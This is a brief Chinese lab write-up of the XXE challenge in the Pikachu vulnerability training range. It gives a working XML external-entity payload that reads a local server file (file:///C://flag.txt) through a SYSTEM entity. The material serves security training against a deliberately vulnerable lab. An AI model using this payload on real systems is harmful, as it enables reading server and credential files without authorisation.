0
点赞
收藏
分享

微信扫一扫

Pikachu漏洞靶场 XXE(xml外部实体注入漏洞)

秀妮_5519 2022-04-13 阅读 74

XXE(xml外部实体注入漏洞)

概述


提交正常url编码之后的xml数据,显示正常。

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY test "test1">
]>
<name>&test;</name>

提交payload,查看服务器上文件:

<?xml version = "1.0"?>
<!DOCTYPE ANY [
	<!ENTITY f SYSTEM "file:///C://flag.txt">
]>
<x>&f;</x>

举报

相关推荐

0 条评论